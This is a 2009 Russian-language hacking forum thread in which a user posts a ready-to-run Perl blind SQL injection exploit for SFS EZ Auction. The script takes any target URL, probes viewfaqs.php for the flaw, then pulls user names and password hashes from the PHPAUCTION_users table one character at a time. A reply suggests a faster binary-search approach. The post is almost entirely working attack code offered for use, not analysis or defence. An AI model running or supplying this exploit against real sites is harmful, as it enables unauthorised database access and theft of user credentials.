SFS Auction Blind sql injection Exploit

Discussion in 'Веб-уязвимости' started by Dimi4, 30 Apr 2009.

  1. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    SFS Auction Blind sql injection Exploit

    Code:
    #!/usr/bin/perl -w
    
    use strict;
    use LWP::Simple;
    
    $| = 1;
    
    print q {
    
    :::::::::::::::::::::::::::::::::::::::::::::::::::
    :: SFS EZ Auction  Blind sql injection  exploit  ::
    ::                written by Dimi4               ::
    :::::::::::::::::::::::::::::::::::::::::::::::::::
    
    [~] Greetz: 
    [~] UASC uasc.org.ua
    [~] ANTICHAT forum.antichat.ru
    
    };
    
    if (@ARGV < 1) {
     print "Usage: perl exploit.pl [url] \nExample: perl exploit.pl www.target.com/demo\n";
     exit;
    }
    
    my $page = shift;
    my $uid  = shift;
    
    my $prefix;
    
    my @charset = ('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9',':');
    
    print "[x] Vulnerability check...\n";
    
    my $chreq = get("http://".$page."/viewfaqs.php?cat=1+and+1=0");
    
    if (($chreq =~ m/DWarning/i) || ($chreq =~ m/mysql_result()/i)) { 
    
    print "[x] Seems to be vulnerable!\n";
    
    } else {
    
    print "[o] Seems to be patched, sorry\n";
    exit;
    
    }
    
    
    print "[+] Getting hash...\n";
    print "[+] Hash: ";
    
    my $curnum = 1;
    
    while($curnum < 62) {
    
    my $false_result = get("http://".$page."/viewfaqs.php?cat=1+and+1=1+and+ascii(substring(version(),".$curnum.",1))=-1");
    
    foreach(@charset) {
    
     my $ascode       = ord($_);
     my $result       = get("http://".$page."/viewfaqs.php?cat=1+and+1=1+and+ascii(substring((SELECT+concat_ws(0x3a,name,password)+from+PHPAUCTION_users),".$curnum.",1))=".$ascode);
    
     if (length($result) != 0) {
      if (length($result) != length($false_result)) {
       print chr($ascode);
       $curnum++;
       }
      }
     }
    }
    
    print "\n[+] Done!\n";
     

    Attached Files:

    4 people like this.
  2. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Dimi4Слать по 63 запроса на символ - не клёво. Тем более если можно обойтись в худшем случае 6 запросами.
     
    3 people like this.